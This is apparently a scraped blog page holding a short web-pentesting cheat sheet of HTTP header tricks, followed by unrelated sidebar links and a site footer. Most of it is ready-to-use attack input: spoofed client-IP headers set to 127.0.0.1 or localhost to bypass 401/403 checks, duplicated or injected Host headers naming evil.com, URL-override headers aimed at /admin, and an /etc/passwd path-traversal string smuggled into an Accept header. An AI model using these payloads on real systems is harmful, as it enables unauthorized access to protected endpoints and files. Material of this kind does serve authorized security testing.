• HTTP-Headers-And-Tricks


    # Add something like 127.0.0.1, localhost, 192.168.1.2, target.com or /admin, /console
    Client-IP:
    Connection:
    Contact:
    Forwarded:
    From:
    Host:
    Origin:
    Referer:
    True-Client-IP:
    X-Client-IP:
    X-Custom-IP-Authorization:
    X-Forward-For:
    X-Forwarded-For:
    X-Forwarded-Host:
    X-Forwarded-Server:
    X-Host:
    X-Original-URL:
    X-Originating-IP:
    X-Real-IP:
    X-Remote-Addr:
    X-Remote-IP:
    X-Rewrite-URL:
    X-Wap-Profile:
    
    # Try to repeat same Host header 2 times
    Host: legit.com
    Stuff: stuff
    Host: evil.com
    
    # Bypass type limit
    Accept: application/json, text/javascript, */*; q=0.01
    Accept: ../../../../../../../../../etc/passwd{{'
    
    # Try to change the HTTP version from 1.1 to HTTP/0.9 and remove the host header
    
    # 401/403 bypasses 
    # Whitelisted IP 127.0.0.1 or localhost
    Client-IP: 127.0.0.1
    Forwarded-For-Ip: 127.0.0.1
    Forwarded-For: 127.0.0.1
    Forwarded-For: localhost
    Forwarded: 127.0.0.1
    Forwarded: localhost
    True-Client-IP: 127.0.0.1
    X-Client-IP: 127.0.0.1
    X-Custom-IP-Authorization: 127.0.0.1
    X-Forward-For: 127.0.0.1
    X-Forward: 127.0.0.1
    X-Forward: localhost
    X-Forwarded-By: 127.0.0.1
    X-Forwarded-By: localhost
    X-Forwarded-For-Original: 127.0.0.1
    X-Forwarded-For-Original: localhost
    X-Forwarded-For: 127.0.0.1
    X-Forwarded-For: localhost
    X-Forwarded-Server: 127.0.0.1
    X-Forwarded-Server: localhost
    X-Forwarded: 127.0.0.1
    X-Forwarded: localhost
    X-Forwared-Host: 127.0.0.1
    X-Forwared-Host: localhost
    X-Host: 127.0.0.1
    X-Host: localhost
    X-HTTP-Host-Override: 127.0.0.1
    X-Originating-IP: 127.0.0.1
    X-Real-IP: 127.0.0.1
    X-Remote-Addr: 127.0.0.1
    X-Remote-Addr: localhost
    X-Remote-IP: 127.0.0.1
    
    # Fake Origin - make GET request to accesible endpoint with:
    X-Original-URL: /admin
    X-Override-URL: /admin
    X-Rewrite-URL: /admin
    Referer: /admin
    # Also try with absoulte url https:/domain.com/admin
    
    # Method Override
    X-HTTP-Method-Override: PUT
    
    # Provide full path GET
    GET https://vulnerable-website.com/ HTTP/1.1
    Host: evil-website.com
    
    # Add line wrapping
    GET /index.php HTTP/1.1
     Host: vulnerable-website.com
    Host: evil-website.com
    
    # Wordlists
    https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/BurpSuite-ParamMiner/lowercase-headers
    https://github.com/danielmiessler/SecLists/tree/bbb4d86ec1e234b5d3cfa0a4ab3e20c9d5006405/Miscellaneous/web/http-request-headers
  • 相关阅读:
    day 66 ORM django 简介
    day 65 HTTP协议 Web框架的原理 服务器程序和应用程序
    jQuery的事件绑定和解绑 事件委托 轮播实现 jQuery的ajax jQuery补充
    background 超链接导航栏案例 定位
    继承性和层叠性 权重 盒模型 padding(内边距) border(边框) margin 标准文档流 块级元素和行内元素
    属性选择器 伪类选择器 伪元素选择器 浮动
    css的导入方式 基础选择器 高级选择器
    03-body标签中相关标签
    Java使用内存映射实现大文件的上传
    正则表达式
  • 原文地址:https://www.cnblogs.com/anbuxuan/p/15103393.html
Copyright © 2020-2023  润新知